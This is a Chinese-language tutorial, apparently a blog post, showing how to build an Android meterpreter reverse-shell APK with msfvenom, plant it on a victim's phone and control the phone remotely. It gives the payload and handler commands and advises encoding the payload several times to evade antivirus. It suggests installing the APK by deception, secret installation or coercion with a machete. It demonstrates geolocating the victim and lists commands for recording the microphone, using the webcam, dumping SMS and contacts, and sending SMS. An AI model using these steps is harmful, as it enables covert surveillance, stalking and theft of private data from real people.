思路如入侵windows,linux类似,在操作目标时命令稍有不同,如定位,发短信等
生成木马文件
┌─[root@parrot]─[~]
└──╼ #msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.168 LPORT=55555 R > test.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8826 bytes
注:制作木马文件时应该对木马文件进行多重编码做免杀,否则会轻易被查杀
植入目标安卓手机
手段不限,如社会工程学,砍刀逼迫,偷偷安装等.本次演示把test.apk文件导入安卓手机进行安装并运行
远程控制
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
至此,成功获取一个session,先来看看安卓版本
meterpreter > sysinfo
Computer : localhost
OS : Android 4.4.4 - Linux 3.4.0-g26e4aff-00680-gaa7791b (armv7l)
Meterpreter : java/android
现在可以像操作windows目标一样进行增删改查等操作了.
下面的一些操作有为手机特性,需要介绍一下
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
以上为远程录音和摄像头控制,细节不赘述.
Android Commands
================
Command Description
------- -----------
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
wlan_geolocate Get current lat-long using WLAN information
以上可以看出,可以对检测手机是否root,获取通话记录,电话本,短信记录,偷发短信,远程定位,下面随机举例:
查看手机是否已经root
meterpreter > check_root
[+] Device is rooted
远程定位
meterpreter > geolocate
[*] Current Location:
Latitude: XX.25891
Longitude: XXX.461641
To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=XX.25891,XXX.461641&sensor=true
访问链接发现,定位准确度也很高,
控制发送短信
短信发送成功